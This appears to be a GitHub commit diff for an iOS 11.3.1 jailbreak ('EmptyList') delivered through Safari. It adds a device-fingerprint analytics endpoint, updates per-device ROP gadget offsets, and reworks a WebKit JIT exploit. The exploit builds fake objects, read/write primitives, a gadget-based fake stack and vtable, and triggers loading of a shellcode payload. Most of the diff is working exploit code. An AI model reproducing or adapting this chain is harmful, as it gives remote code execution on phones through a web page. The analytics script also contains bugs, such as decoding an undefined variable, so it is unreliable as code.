Skip to content

Commit

Permalink
Bug fixes and improvements
Browse files Browse the repository at this point in the history
  • Loading branch information
@MTJailed
MTJailed committed Jul 3, 2018
1 parent 4dff7a6 commit 85c88c9
Show file tree
Hide file tree
Showing 6 changed files with 182 additions and 82 deletions.
74 changes: 74 additions & 0 deletions analytics/analytics.php
View file
@@ -0,0 +1,74 @@
<?php

class stdObject {
public function __construct(array $arguments = array()) {
if (!empty($arguments)) {
foreach ($arguments as $property => $argument) {
$this->{$property} = $argument;
}
}
}

public function __call($method, $arguments) {
$arguments = array_merge(array("stdObject" => $this), $arguments); // Note: method argument 0 will always referred to the main class ($this).
if (isset($this->{$method}) && is_callable($this->{$method})) {
return call_user_func_array($this->{$method}, $arguments);
} else {
throw new Exception("Fatal error: Call to undefined method stdObject::{$method}()");
}
}
}

function REQUEST_IS_POST() {
return isset($_SERVER) && isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD']=='POST';
}

function VALIDATE_REQUEST() {
return $_POST['fingerprint'] != '' &&
'' != $_POST['type'] &&
'' != $_POST['os_vers'] &&
'' != $_POST['os_build'] &&
'' != $_POST['productname'] &&
'' != $_POST['webkit_vers'] &&
'' != $_POST['safari_vers'] &&
'' != $_POST['locale'] &&
'' != $_POST['timezone'];
}

try {
if (REQUEST_IS_POST() && VALIDATE_REQUEST()){

$device = new stdObject();

function sanitize_input($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data);
return $data;
}

$device->fingerprint = sanitize_input($_POST['fingerprint']);
$device->type = sanitize_input($_POST['type']);
$device->productname = sanitize_input($_POST['productname']);
$device->os_vers = sanitize_input($_POST['os_vers']);
$device->os_build = sanitize_input($_POST['os_build']);
$device->webkit_vers = sanitize_input($_POST['webkit_vers']);
$device->safari_vers = sanitize_input($_POST['safari_vers']);
$device->locale = sanitize_input($_POST['locale']);
$device->timezone = sanitize_input($_POST['timezone']);
$device->submission_time = round(microtime(true) * 1000);

$data = file_get_contents('devices.json');
$data = json_decode($data_old, true);
$data[] = $device;
$data_new = json_encode($data);
$fp = fopen('devices.json', 'a+');
fwrite($fp, $data_new);
fclose($fp);
header('Content-Type: application/json');
echo $data_new;
}
} catch(Exception $e) {
echo 'Oops something seems to have gone wrong: '.$e->getMessage().'\n';
}
?>
10 changes: 9 additions & 1 deletion modules/jsfree.module.js
View file
@@ -1,4 +1,12 @@
//Function for freeing an object on the window, well sortof.
var JSFree = function(obj) {
window[obj] = undefined;
};
};

var JSAlloc = function size(name, size) {
if(typeof eval('window.'+name) !== 'undefined') return false;
eval('window.'+name+'=new Array('+size+');');
};

free = JSFree;
malloc = JSAlloc;
12 changes: 6 additions & 6 deletions modules/offsets.module.js
View file
Expand Up @@ -130,9 +130,9 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b31a10c8,
usefastpermissions_jitcopy: 0x1b1bf0018,
ptr_stack_check_guard: 0x1b30f9ef8,
modelio_popx8: 0x18d2f6564,
modelio_popx8: 0x18d2f6574,
coreaudio_popx2: 0x18409ddbc,
linkcode_gadget: 0x187bd18c8
linkcode_gadget: 0x187bd187c
};

//iPhone 6S+
Expand Down Expand Up @@ -225,6 +225,7 @@ var Offsets = function Offsets(sw_vers, productname) {
//iPhone X
offsets["iPhone X"][11.31] = {
padding: 0x20,
vtable: 0x189c9a808,
disableprimitivegigacage: 0x18851a7d4,
g_gigacagebaseptrs: 0x1b1cb0000,
g_typedarraypoisons: 0x1b3281720,
Expand All @@ -236,10 +237,9 @@ var Offsets = function Offsets(sw_vers, productname) {
dlsym: 0x18084ef90,
longjmp: 0x180b12778,
callbacks: 0x1b3281698,
modelio_popx8: 0,
coreaudio_popx2: 0,
linkcode_gadget: 0,
vtable: 0
modelio_popx8: 0x18d2f6564,
coreaudio_popx2: 0x18409ddbc,
linkcode_gadget: 0x187bd18c8
};

//fixing up offsets that are the same accross devices, without having to allocate more memory for them.
Expand Down
166 changes: 92 additions & 74 deletions modules/sploit.1131.module.js
View file
Expand Up @@ -11,28 +11,29 @@

using('verbosity');

//Configuration
var INTEGRITY_CHECKS = false; //enable this if you want to check the shellcode for integrity.

var UNITY = {
TEN: 10,
HUNDRED: 100,
THOUSAND: 1000,
MILLION: 1000000,
BILLION: 1000000000
};

_off = {};

ITERS = UNITY.TEN * UNITY.THOUSAND;
ALLOCS = UNITY.THOUSAND;
counter = 0;

//offsets
_off = {};

//Casting and types
var conversion_buffer = new ArrayBuffer(8);
var f64 = new Float64Array(conversion_buffer);
var i32 = new Uint32Array(conversion_buffer);
var BASE32 = 0x100000000;


//Initialisation of globals
var workbuf = new ArrayBuffer(0x1000000)
var u32_buffer = new Uint32Array(workbuf);
var u8_buffer = new Uint8Array(workbuf);
Expand Down Expand Up @@ -99,8 +100,10 @@ function trigger(constr, modify, res, val) {
`)
}


//The exploit
var pwn = function() {

_off = window.chosendevice.offsets;
console.log('Starting stage 1...');

Expand Down Expand Up @@ -188,9 +191,6 @@ var pwn = function() {
p3: 0xfffffff, // Butterfly indexing mask
};


if(verbosity === VERBOSITY.VERBOSE) print("Using padding: "+hex(FPO+0x8));

var fake_addr = stage1.addrof(outer) +FPO+0x8;

if(verbosity >= VERBOSITY.HIGH) print('fake object is at ' + hex(fake_addr));
Expand Down Expand Up @@ -284,6 +284,8 @@ var pwn = function() {
}

stage2.test();


if(verbosity === VERBOSITY.VERBOSE) print("Stage 2 test succeeded, continueing...");

var wrapper = document.createElement('div');
Expand Down Expand Up @@ -338,78 +340,94 @@ var pwn = function() {
+ '\njitWriteSeparateHeapsFunction @ ' + hex(jitWriteSeparateHeapsFunction)
+ '\nuseFastPermisionsJITCopy @ ' + hex(useFastPermisionsJITCopy)
);

//JIT Hardening stuff
if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction) {
// Probably an older phone, should be even easier
//fail(3);

//logic for older devices, credit goes to @idiidk
function legacy_execution() {

//See ExecutableAllocator.cpp on webkit
//jitWriteSeperateHeapsFunc
}

if(verbosity === VERBOSITY.VERBOSE) print("Setting up shellcode in memory...");

//Now set up our shellcode for code execution
var callback_vector = stage2.read64(callbacks);
function modern_execution() {

//Now set up our shellcode for code execution
var callback_vector = stage2.read64(callbacks);
var poison = stage2.read64(g_typedArrayPoisons + 6*8);
var buffer_addr = xor(stage2.read64(stage2.addrof(u32_buffer) + 0x18), poison);

var poison = stage2.read64(g_typedArrayPoisons + 6*8);
var buffer_addr = xor(stage2.read64(stage2.addrof(u32_buffer) + 0x18), poison);
var shellcode_src = buffer_addr + 0x4000;
var shellcode_dst = endOfFixedExecutableMemoryPool - 0x1000000;

var shellcode_src = buffer_addr + 0x4000;
var shellcode_dst = endOfFixedExecutableMemoryPool - 0x1000000;
if (shellcode_dst < startOfFixedExecutableMemoryPool) {
fail(4);
}

if (shellcode_dst < startOfFixedExecutableMemoryPool) {
fail(4);
stage2.write64(shellcode_src + 4, dlsym);

//set up our fake executable stack
var fake_stack = [
0,
shellcode_length, // x2
0,

pop_x8,

0, 0, 0, 0, 0,
shellcode_dst, // x8
0, 0, 0, 0,
stage2.read64(ptr_stack_check_guard) + 0x58,

linkcode_gadget,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

shellcode_dst
];

// Set up fake vtable at offset 0
u32_buffer[0] = longjmp % BASE32;
u32_buffer[1] = longjmp / BASE32;

// Set up fake stack at offset 0x2000
for (var i = 0; i < fake_stack.length; ++i) {
u32_buffer[0x2000/4 + 2*i] = fake_stack[i] % BASE32;
u32_buffer[0x2000/4 + 2*i+1] = fake_stack[i] / BASE32;
}

//lets set up our code execution of the dylib payload
stage2.write_non_zero(el_addr, [
buffer_addr, // fake vtable
0,
shellcode_src, // x21
0, 0, 0, 0, 0, 0, 0,
0, // fp

pop_x2, // lr
0,
buffer_addr + 0x2000, // sp
]);
if (hex(stage2.read64(el_addr + 16)) === hex(shellcode_src)) {
print('shellcode is at: ' + hex(shellcode_dst));
} else {
fail('Failed writing shellcode');
return false;
}
}

stage2.write64(shellcode_src + 4, dlsym);

//set up our fake executable stack
var fake_stack = [
0,
shellcode_length, // x2
0,

pop_x8,

0, 0, 0, 0, 0,
shellcode_dst, // x8
0, 0, 0, 0,
stage2.read64(ptr_stack_check_guard) + 0x58,

linkcode_gadget,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

shellcode_dst
];

// Set up fake vtable at offset 0
u32_buffer[0] = longjmp % BASE32;
u32_buffer[1] = longjmp / BASE32;

// Set up fake stack at offset 0x2000
for (var i = 0; i < fake_stack.length; ++i) {
u32_buffer[0x2000/4 + 2*i] = fake_stack[i] % BASE32;
u32_buffer[0x2000/4 + 2*i+1] = fake_stack[i] / BASE32;
//JIT Hardening stuff
if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction) {
//legacy_execution();
modern_execution(); //just for fun
} else {
modern_execution();
}

//lets set up our code execution of the dylib payload
stage2.write_non_zero(el_addr, [
buffer_addr, // fake vtable
0,
shellcode_src, // x21
0, 0, 0, 0, 0, 0, 0,
0, // fp

pop_x2, // lr
0,
buffer_addr + 0x2000, // sp
]);

//if(verbosity >= VERBOSITY.HIGH) print('shellcode is at ' + hex(shellcode_dst));
if(verbosity >= VERBOSITY.DEFAULT) print('EmptyList is started, please close all background apps then dismiss this alert.');

if(verbosity >= VERBOSITY.DEFAULT) print('EmptyList is started, please close all background apps then dismiss this alert.');
wrapper.addEventListener('click', function(){}); //execute the shellcode
return true;
};


function integrity_checks(buffer) {
if(INTEGRITY_CHECKS) {
var shellcode_data = new Uint8Array(buffer);
Expand All @@ -422,11 +440,11 @@ function integrity_checks(buffer) {
};

if(
shellcode_hashes.md5 !== "5b8d489beb89a7515dc7fb5ee2f4092d" ||
shellcode_hashes.sha1 !== "5d97f3843c1a3b88c7a95dae803b46e07a67d3ed" ||
shellcode_hashes.sha256 !== "a4a3254bc86d5b2030c0637173b927a489b98d1d29fcfcc8232636eec94a2fe8" ||
shellcode_hashes.sha384 !== "78791343c427ddd51c1bc236f77bafc4cfef04796f931d856e6652aadedb5ab54e46fe9b05e98ce7dc982eba9f1c6220" ||
shellcode_hashes.sha512 !== "ef48614b78b42be7bedb79a7aa768eb19ad8fb05cefac2d68c8d74ab6a95d77aa1054d255294b5bf7e9ece648ac916fa8999e79aa93a707732b9850418bd0053"
shellcode_hashes.md5 !== "4a7cb4df072782a2a0273593b96f5278" ||
shellcode_hashes.sha1 !== "1fdbc8b15b25819eb8403e402ca7f32f489ff01d" ||
shellcode_hashes.sha256 !== "2d3d35db971e0697aaacc56ffc2af2967609f3c016a9de180b2ba9a4adbb74d0" ||
shellcode_hashes.sha384 !== "f277af627fceec928b6579ac67c8173abde382ed836f13416a1c3e215d3928cd79bcbd53b9b7fef2188a5afeec80034c" ||
shellcode_hashes.sha512 !== "e4c01d654f1f33002da2033c8eb9509e7fb2f5275d7fc4dfd49fd420cf76da6b3b712df4e0c35e51e66c9c5249a3c7146c14e01242db77673a747e73ef649bdc"
) throw new Error('Shellcode integrity check failed.');
}
}
Expand Down
2 changes: 1 addition & 1 deletion modules/sploit.module.js
View file
Expand Up @@ -172,7 +172,7 @@ function strategy_select() {
else if(osversion_between(11.3, 11.31)) {

//We firstly need to check if the client's device model is of one that this strategy supports
var supported_devices = ["iPhone 8", "iPhone 8+", "iPhone 6S", "iPhone 6+", "iPhone 5S"];
var supported_devices = ["iPhone X", "iPhone 8", "iPhone 8+", "iPhone 6S", "iPhone 6+", "iPhone 5S"];
var supported = false;

if(!device.ProductName) return false; //Sanity check making sure to only continue if the product name of the device was detected
Expand Down
Binary file modified payloads/11_3_1/emptylist.bin
View file
Binary file not shown.

0 comments on commit 85c88c9

Please sign in to comment.